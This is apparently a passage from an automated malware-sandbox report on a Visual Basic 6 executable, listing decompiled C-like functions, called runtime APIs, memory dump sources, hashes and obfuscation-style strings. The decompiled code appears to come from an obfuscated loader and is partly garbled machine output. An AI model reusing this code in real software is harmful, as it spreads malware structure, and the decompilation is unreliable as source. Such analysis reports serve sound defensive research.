                  				} else {
                  					_v152 = _v152 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x10;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v156 = _t226;
                  				} else {
                  					_v156 = _v156 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x11;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v160 = _t226;
                  				} else {
                  					_v160 = _v160 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x12;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v164 = _t226;
                  				} else {
                  					_v164 = _v164 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x13;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v168 = _t226;
                  				} else {
                  					_v168 = _v168 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x14;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v172 = _t226;
                  				} else {
                  					_v172 = _v172 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x15;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v176 = _t226;
                  				} else {
                  					_v176 = _v176 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x16;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v180 = _t226;
                  				} else {
                  					_v180 = _v180 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x17;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v184 = _t226;
                  				} else {
                  					_v184 = _v184 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x18;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v188 = _t226;
                  				} else {
                  					_v188 = _v188 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x19;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v192 = _t226;
                  				} else {
                  					_v192 = _v192 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x1a;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v196 = _t226;
                  				} else {
                  					_v196 = _v196 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x1b;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v200 = _t226;
                  				} else {
                  					_v200 = _v200 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_v80 = 0x1c;
                  				if(_v80 >= 0x1d) {
                  					L0040139C();
                  					_v204 = _t226;
                  				} else {
                  					_v204 = _v204 & 0x00000000;
                  				}
                  				L00401396();
                  				 *((char*)(_v56 + _v80)) = _t226;
                  				_push(E0040E186);
                  				L00401450();
                  				L00401462();
                  				_v76 =  &_v68;
                  				_t228 =  &_v76;
                  				_push(_t228);
                  				_push(0);
                  				L00401390();
                  				return _t228;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040DBB0
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040DBDA
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040DBE5
                  • __vbaAryConstruct2.MSVBVM60(?,0040B0E0,00000011,?,?,?,?,004012A6), ref: 0040DBF5
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC0A
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC16
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC36
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC42
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC62
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC6E
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DC8E
                  • __vbaUI1I2.MSVBVM60 ref: 0040DC9A
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DCBA
                  • __vbaUI1I2.MSVBVM60 ref: 0040DCC6
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DCE6
                  • __vbaUI1I2.MSVBVM60 ref: 0040DCF2
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD12
                  • __vbaUI1I2.MSVBVM60 ref: 0040DD1E
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD3E
                  • __vbaUI1I2.MSVBVM60 ref: 0040DD4A
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD6A
                  • __vbaUI1I2.MSVBVM60 ref: 0040DD76
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DD96
                  • __vbaUI1I2.MSVBVM60 ref: 0040DDA2
                  • __vbaUI1I2.MSVBVM60 ref: 0040DDCE
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DDF1
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE00
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE23
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE32
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE55
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE64
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE87
                  • __vbaUI1I2.MSVBVM60 ref: 0040DE96
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DEB9
                  • __vbaUI1I2.MSVBVM60 ref: 0040DEC8
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DEEB
                  • __vbaUI1I2.MSVBVM60 ref: 0040DEFA
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF1D
                  • __vbaUI1I2.MSVBVM60 ref: 0040DF2C
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF4F
                  • __vbaUI1I2.MSVBVM60 ref: 0040DF5E
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DF81
                  • __vbaUI1I2.MSVBVM60 ref: 0040DF90
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DFB3
                  • __vbaUI1I2.MSVBVM60 ref: 0040DFC2
                  • __vbaUI1I2.MSVBVM60 ref: 0040DFF4
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E017
                  • __vbaUI1I2.MSVBVM60 ref: 0040E026
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E049
                  • __vbaUI1I2.MSVBVM60 ref: 0040E058
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E07B
                  • __vbaUI1I2.MSVBVM60 ref: 0040E08A
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E0AD
                  • __vbaUI1I2.MSVBVM60 ref: 0040E0BC
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E0DF
                  • __vbaUI1I2.MSVBVM60 ref: 0040E0EE
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E111
                  • __vbaUI1I2.MSVBVM60 ref: 0040E120
                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040E143
                  • __vbaUI1I2.MSVBVM60 ref: 0040E152
                  • __vbaFreeVar.MSVBVM60(0040E186), ref: 0040E167
                  • __vbaFreeStr.MSVBVM60(0040E186), ref: 0040E16F
                  • __vbaAryDestruct.MSVBVM60(00000000,?,0040E186), ref: 0040E180
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$BoundsErrorGenerate$Free$ChkstkConstruct2CopyDestruct
                  • String ID:
                  • API String ID: 1600147872-0
                  • Opcode ID: 070233ac252eb0c3092adea65e7e106cc786b6420f791ad58a563d68086ee9b5
                  • Instruction ID: 2b71d42fce75199390b12a949527bc60e3b81bde9108a311d8546963b0edb039
                  • Opcode Fuzzy Hash: 070233ac252eb0c3092adea65e7e106cc786b6420f791ad58a563d68086ee9b5
                  • Instruction Fuzzy Hash: 9D02A074C06208CFEB20EFA6C5517ACBBB1AF16309F1484AFD416B6692C778154ACF1B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E0040BA84(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, signed int _a24) {
                  				intOrPtr _v4;
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				char _v24;
                  				char* _v28;
                  				char* _v32;
                  				void* _v36;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				char _v60;
                  				signed int _v68;
                  				char _v76;
                  				intOrPtr _v84;
                  				char _v92;
                  				short _v100;
                  				char _v108;
                  				char _v124;
                  				char _v140;
                  				char* _v148;
                  				char _v156;
                  				intOrPtr _v196;
                  				char _v204;
                  				char* _v208;
                  				short _v212;
                  				char* _v216;
                  				signed int _v220;
                  				signed int _v224;
                  				char* _v236;
                  				intOrPtr _v248;
                  				intOrPtr* _v252;
                  				intOrPtr _v264;
                  				void* _v272;
                  				void* _t159;
                  				char* _t165;
                  				void* _t166;
                  				char* _t167;
                  				char* _t170;
                  				char* _t173;
                  				signed short _t182;
                  				char* _t194;
                  				intOrPtr _t195;
                  				signed int _t197;
                  				short _t208;
                  				char* _t213;
                  				intOrPtr _t220;
                  				void* _t223;
                  				void* _t226;
                  				void* _t230;
                  				char* _t235;
                  				void* _t258;
                  				void* _t261;
                  				void* _t262;
                  				void* _t263;
                  				void* _t265;
                  				intOrPtr _t266;
                  				void* _t267;
                  				intOrPtr* _t268;
                  
                  				_t261 = __esi;
                  				_t258 = __edi;
                  				_t230 = __ebx;
                  				_t263 = _t265;
                  				_t266 = _t265 - 0xc;
                  				asm("cmpsb");
                  				asm("adc al, [eax]");
                  				 *[fs:0x0] = _t266;
                  				 *0xd8 =  *0xd8 + 0xd8;
                  				_t159 = 0xd8 + __ecx;
                  				asm("stc");
                  				asm("invalid");
                  				_v12 = _t266;
                  				_v8 = E00401150;
                  				_v4 = 0;
                  				 *0xd8 =  *0xd8 + _t159;
                  				 *((intOrPtr*)( *_a8 + 4))(_a8, __edi, __esi, __ebx, __edi,  *[fs:0x0], _t262);
                  				_push( &_v24);
                  				_push(0x2003f);
                  				_push(0);
                  				_push( *_a16);
                  				_t165 =  &_v56;
                  				_push(_t165);
                  				L00401474();
                  				_push(_t165);
                  				_t166 = _a12;
                  				_push( *_t166);
                  				E0040AEC0();
                  				_v208 = _t166;
                  				L0040146E();
                  				_push(_v56);
                  				_push(_a16);
                  				L00401468();
                  				_t167 = _v208;
                  				_v32 = _t167;
                  				L00401462();
                  				if(_v32 == 0) {
                  					_v68 = _v68 & 0x00000000;
                  					_v76 = 2;
                  					_push( &_v76);
                  					_push(0x400);
                  					L00401456();
                  					L0040145C();
                  					L00401450();
                  					_v52 = 0x400;
                  					_push( &_v52);
                  					_push(_v48);
                  					_t170 =  &_v60;
                  					_push(_t170);
                  					L00401474();
                  					_push(_t170);
                  					_push( &_v36);
                  					_push(0);
                  					_push( *_a20);
                  					_t173 =  &_v56;
                  					_push(_t173);
                  					L00401474();
                  					_push(_t173);
                  					_push(_v24);
                  					E0040AF0C();
                  					_v208 = _t173;
                  					L0040146E();
                  					_push(_v56);
                  					_push(_a20);
                  					L00401468();
                  					_push(_v60);
                  					_push( &_v48);
                  					L00401468();
                  					_v32 = _v208;
                  					_push( &_v60);
                  					_t167 =  &_v56;
                  					_push(_t167);
                  					_push(2);
                  					L0040144A();
                  					_t267 = _t266 + 0xc;
                  					if(_v32 == 0) {
                  						_v68 = 1;
                  						_v76 = 2;
                  						_v148 =  &_v48;
                  						_v156 = 0x4008;
                  						_push( &_v76);
                  						_push(_v52);
                  						_push( &_v156);
                  						_push( &_v92);
                  						L00401438();
                  						_push( &_v92);
                  						_t182 =  &_v56;
                  						_push(_t182);
                  						L0040143E();
                  						_push(_t182);
                  						L00401444();
                  						asm("sbb eax, eax");
                  						_v212 =  ~( ~_t182 + 1);
                  						_t235 =  &_v56;
                  						L00401462();
                  						_push( &_v92);
                  						_push( &_v76);
                  						_push(2);
                  						L00401432();
                  						_t268 = _t267 + 0xc;
                  						if(_v212 == 0) {
                  							_v148 =  &_v48;
                  							_v156 = 0x4008;
                  							_push(_v52);
                  							_push( &_v156);
                  							_push( &_v76);
                  							L00401426();
                  							_push( &_v76);
                  							L0040142C();
                  							L0040145C();
                  							L00401450();
                  							goto L17;
                  						} else {
                  							_v148 =  &_v48;
                  							_v156 = 0x4008;
                  							_t226 = _v52 - 1;
                  							if(_t226 < 0) {
                  								L31:
                  								L004013FC();
                  								 *[fs:0x0] = _t268;
                  								L004012A0();
                  								_v252 = _t268;
                  								_v248 = 0x401160;
                  								_v264 = 0xa066336a;
                  								_t223 =  *_t268(0x402403, _t258, _t261, _t230, 0x10,  *[fs:0x0], 0x4012a6, _t235, _t235, _t263);
                  								L0040145C();
                  								_push(_v264);
                  								_push(L"Lindormen");
                  								L004013F6();
                  								L0040145C();
                  								_push(_v264);
                  								_push(L"Lindormen");
                  								L004013F6();
                  								L0040145C();
                  								_push(E0040BFB7);
                  								L00401462();
                  								return _t223;
                  							} else {
                  								_push(_t226);
                  								_push( &_v156);
                  								_push( &_v76);
                  								L00401426();
                  								_push( &_v76);
                  								L0040142C();
                  								L0040145C();
                  								L00401450();
                  								L17:
                  								_v216 = _v36;
                  								_t194 = _v216;
                  								_v236 = _t194;
                  								if(_v236 == 1) {
                  									L00401420();
                  									goto L27;
                  								} else {
                  									if(_v236 == 4) {
                  										_v224 = 1;
                  										_v220 = _v220 | 0xffffffff;
                  										_push(_v48);
                  										L0040141A();
                  										_v28 = _t194;
                  										while(_v28 >= _v224) {
                  											_v196 =  *_a24;
                  											_v204 = 8;
                  											_v68 = 1;
                  											_v76 = 2;
                  											_v148 =  &_v48;
                  											_v156 = 0x4008;
                  											_push( &_v76);
                  											_push(_v28);
                  											_push( &_v156);
                  											_push( &_v92);
                  											L00401438();
                  											_push( &_v92);
                  											_t208 =  &_v56;
                  											_push(_t208);
                  											L0040143E();
                  											_push(_t208);
                  											L00401444();
                  											_v100 = _t208;
                  											_v108 = 2;
                  											_push( &_v108);
                  											_push( &_v124);
                  											L0040140E();
                  											_push( &_v204);
                  											_push( &_v124);
                  											_t213 =  &_v140;
                  											_push(_t213);
                  											L00401414();
                  											_push(_t213);
                  											L0040142C();
                  											L0040145C();
                  											_t235 =  &_v56;
                  											L00401462();
                  											_push( &_v140);
                  											_push( &_v124);
                  											_push( &_v108);
                  											_push( &_v92);
                  											_push( &_v76);
                  											_push(5);
                  											L00401432();
                  											_t268 = _t268 + 0x18;
                  											_t220 = _v28 + _v220;
                  											if(_t220 < 0) {
                  												goto L31;
                  											} else {
                  												_v28 = _t220;
                  												continue;
                  											}
                  											goto L33;
                  										}
                  										_v84 = 0x80020004;
                  										_v92 = 0xa;
                  										_push(0x40afdc);
                  										_t197 = _a24;
                  										_push( *_t197);
                  										L00401402();
                  										_v68 = _t197;
                  										_v76 = 8;
                  										_push(1);
                  										_push(1);
                  										_push( &_v92);
                  										_push( &_v76);
                  										L00401408();
                  										L0040145C();
                  										_push( &_v92);
                  										_t194 =  &_v76;
                  										_push(_t194);
                  										_push(2);
                  										L00401432();
                  										goto L27;
                  									} else {
                  										L27:
                  										_v44 = _v44 | 0x0000ffff;
                  										_push(_v24);
                  										E0040AF50();
                  										_v208 = _t194;
                  										L0040146E();
                  										_t195 = _v208;
                  										_v32 = _t195;
                  										goto L29;
                  									}
                  								}
                  							}
                  						}
                  					} else {
                  						goto L28;
                  					}
                  				} else {
                  					L28:
                  					L00401420();
                  					_v44 = _v44 & 0x00000000;
                  					_push(_v24);
                  					E0040AF50();
                  					_v208 = _t167;
                  					L0040146E();
                  					_t195 = _v208;
                  					_v32 = _t195;
                  					L29:
                  					_push(E0040BF02);
                  					L00401462();
                  					return _t195;
                  				}
                  				L33:
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040BAA2
                  • __vbaStrToAnsi.MSVBVM60(?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BADA
                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BAF0
                  • __vbaStrToUnicode.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BAFB
                  • __vbaFreeStr.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BB0C
                  • #606.MSVBVM60(00000400,00000002), ref: 0040BB30
                  • __vbaStrMove.MSVBVM60(00000400,00000002), ref: 0040BB3A
                  • __vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0040BB42
                  • __vbaStrToAnsi.MSVBVM60(?,004012A6,00000400,00000400,00000002), ref: 0040BB59
                  • __vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB6E
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB82
                  • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB8D
                  • __vbaStrToUnicode.MSVBVM60(004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB99
                  • __vbaFreeStrList.MSVBVM60(00000002,00000000,?,004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6), ref: 0040BBB1
                  • __vbaStrCopy.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?), ref: 0040BE98
                  • __vbaSetSystemError.MSVBVM60(?), ref: 0040BEB0
                  • __vbaFreeStr.MSVBVM60(0040BF02,?), ref: 0040BEFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
                  • String ID: Lindormen
                  • API String ID: 3225542645-1899767452
                  • Opcode ID: 2ffa878715bb6322c00fd39d47d6e4816f8de85f7fbc7c277a8d7b3a19978486
                  • Instruction ID: aeed3d7d155bbf56620b97de44178cffdf431c07101280a4313b8141d9da73f3
                  • Opcode Fuzzy Hash: 2ffa878715bb6322c00fd39d47d6e4816f8de85f7fbc7c277a8d7b3a19978486
                  • Instruction Fuzzy Hash: FFE1D871D00219ABDB10EFE1C845FDEBBB8EF04308F50856AF115B71A2DB789A458F69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E0040E532(void* __ebx, void* __edi, void* __esi, char* _a4, void* _a8, void* _a24, void* _a52) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v40;
                  				void* _v56;
                  				intOrPtr _v60;
                  				void* _v76;
                  				char _v88;
                  				char _v104;
                  				char* _v128;
                  				char _v136;
                  				char* _v160;
                  				intOrPtr _v168;
                  				intOrPtr _v192;
                  				intOrPtr _v200;
                  				char _v220;
                  				void* _v224;
                  				signed int _v228;
                  				intOrPtr* _v240;
                  				signed int _v244;
                  				short _t63;
                  				short _t64;
                  				char* _t69;
                  				signed int _t73;
                  				void* _t101;
                  				void* _t103;
                  				intOrPtr _t104;
                  
                  				_t104 = _t103 - 0xc;
                  				 *[fs:0x0] = _t104;
                  				L004012A0();
                  				_v16 = _t104;
                  				_v12 = 0x401220;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t101);
                  				L004013E4();
                  				L004013E4();
                  				L004013E4();
                  				_push( &_v104);
                  				L00401372();
                  				_v128 = L"supraspinate";
                  				_v136 = 0x8008;
                  				_push( &_v104);
                  				_t63 =  &_v136;
                  				_push(_t63);
                  				L00401378();
                  				_v224 = _t63;
                  				L00401450();
                  				_t64 = _v224;
                  				if(_t64 != 0) {
                  					_v128 = _a4;
                  					_v136 = 9;
                  					_v160 = L"dreas";
                  					_v168 = 8;
                  					if( *0x410010 != 0) {
                  						_v240 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v240 = 0x410010;
                  					}
                  					_t69 =  &_v88;
                  					L004013CC();
                  					_v224 = _t69;
                  					_t73 =  *((intOrPtr*)( *_v224 + 0x60))(_v224,  &_v220, _t69,  *((intOrPtr*)( *((intOrPtr*)( *_v240)) + 0x318))( *_v240));
                  					asm("fclex");
                  					_v228 = _t73;
                  					if(_v228 >= 0) {
                  						_v244 = _v244 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x40b06c);
                  						_push(_v224);
                  						_push(_v228);
                  						L004013D8();
                  						_v244 = _t73;
                  					}
                  					_v192 = _v220;
                  					_v200 = 3;
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_t64 = 0x10;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(3);
                  					_push(L"JmVo9kBNN3193");
                  					_push(_v60);
                  					L0040136C();
                  					L004013D2();
                  				}
                  				asm("wait");
                  				_push(E0040E758);
                  				L00401450();
                  				L00401450();
                  				L004013D2();
                  				L00401450();
                  				return _t64;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E550
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E57A
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E585
                  • __vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E590
                  • #670.MSVBVM60(?,?,?,?,?,004012A6), ref: 0040E599
                  • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E5BA
                  • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E5C9
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,?,?,?,?,00008008,?), ref: 0040E614
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E64D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E694
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E6C1
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E6D5
                  • __vbaChkstk.MSVBVM60(00000000,?,0040B06C,00000060), ref: 0040E6E9
                  • __vbaLateMemCall.MSVBVM60(?,JmVo9kBNN3193,00000003), ref: 0040E704
                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040E70F
                  • __vbaFreeVar.MSVBVM60(0040E758,00008008,?), ref: 0040E73A
                  • __vbaFreeVar.MSVBVM60(0040E758,00008008,?), ref: 0040E742
                  • __vbaFreeObj.MSVBVM60(0040E758,00008008,?), ref: 0040E74A
                  • __vbaFreeVar.MSVBVM60(0040E758,00008008,?), ref: 0040E752
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.326969950.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.326963504.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.326987404.0000000000410000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.326994380.0000000000412000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Chkstk$#670CallCheckHresultLateNew2
                  • String ID: JmVo9kBNN3193$Pt$dreas$supraspinate
                  • API String ID: 1440615753-71710553
                  • Opcode ID: 2f8e8e2b3a8c9fe5cb0afbe8356c3d11df872246310e99466f676cc38362ce2d
                  • Instruction ID: 27285f04c391c3f7c97fc3be7e103f40ac8df5a2e06bceeda8d4fbc4182cfb55
                  • Opcode Fuzzy Hash: 2f8e8e2b3a8c9fe5cb0afbe8356c3d11df872246310e99466f676cc38362ce2d
                  • Instruction Fuzzy Hash: 00511A70900219DFDB20EF91D845BCDB7B5BF08704F5084AAF405BB2A1DBB95A95CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E0040E85E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v28;
                  				char _v32;
                  				signed int _v36;
                  				char _v40;
                  				intOrPtr _v48;
                  				char _v56;
                  				intOrPtr _v80;
                  				intOrPtr _v88;
                  				char _v108;
                  				void* _v112;
                  				signed int _v116;
                  				intOrPtr* _v120;
                  				signed int _v124;
                  				signed int _v136;
                  				intOrPtr* _v140;
                  				signed int _v144;
                  				intOrPtr* _v148;
                  				signed int _v152;
                  				char* _t73;
                  				char* _t74;
                  				char* _t78;
                  				signed int _t82;
                  				char* _t88;
                  				signed int _t92;
                  				void* _t116;
                  				void* _t118;
                  				intOrPtr _t119;
                  
                  				_t119 = _t118 - 0xc;
                  				 *[fs:0x0] = _t119;
                  				L004012A0();
                  				_v16 = _t119;
                  				_v12 = 0x401240;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
                  				_push(0xb);
                  				_push(0xb);
                  				_push(0x7db);
                  				_push( &_v56);
                  				L00401354();
                  				_t73 =  &_v56;
                  				_push(_t73);
                  				L0040135A();
                  				_v112 =  ~(0 | _t73 != 0x0000ffff);
                  				L00401450();
                  				_t74 = _v112;
                  				if(_t74 != 0) {
                  					if( *0x410010 != 0) {
                  						_v140 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v140 = 0x410010;
                  					}
                  					_t78 =  &_v32;
                  					L004013CC();
                  					_v112 = _t78;
                  					_t82 =  *((intOrPtr*)( *_v112 + 0x120))(_v112,  &_v36, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x314))( *_v140));
                  					asm("fclex");
                  					_v116 = _t82;
                  					if(_v116 >= 0) {
                  						_v144 = _v144 & 0x00000000;
                  					} else {
                  						_push(0x120);
                  						_push(0x40b06c);
                  						_push(_v112);
                  						_push(_v116);
                  						L004013D8();
                  						_v144 = _t82;
                  					}
                  					_v136 = _v36;
                  					_v36 = _v36 & 0x00000000;
                  					_v48 = _v136;
                  					_v56 = 9;
                  					if( *0x410010 != 0) {
                  						_v148 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v148 = 0x410010;
                  					}
                  					_t88 =  &_v40;
                  					L004013CC();
                  					_v120 = _t88;
                  					_t92 =  *((intOrPtr*)( *_v120 + 0x60))(_v120,  &_v108, _t88,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x300))( *_v148));
                  					asm("fclex");
                  					_v124 = _t92;
                  					if(_v124 >= 0) {
                  						_v152 = _v152 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x40b05c);
                  						_push(_v120);
                  						_push(_v124);
                  						L004013D8();
                  						_v152 = _t92;
                  					}
                  					_v80 = _v108;
                  					_v88 = 3;
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(0x10);
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_push(2);
                  					_push(L"IpXl81");
                  					_push(_v28);
                  					L0040136C();
                  					_push( &_v40);
                  					_t74 =  &_v32;
                  					_push(_t74);
                  					_push(2);
                  					L004013C6();
                  					L00401450();
                  				}
                  				_push(E0040EAA9);
                  				L004013D2();
                  				return _t74;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E87C
                  • #538.MSVBVM60(?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8AD
                  • #557.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8B6
                  • __vbaFreeVar.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8CD
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8F1
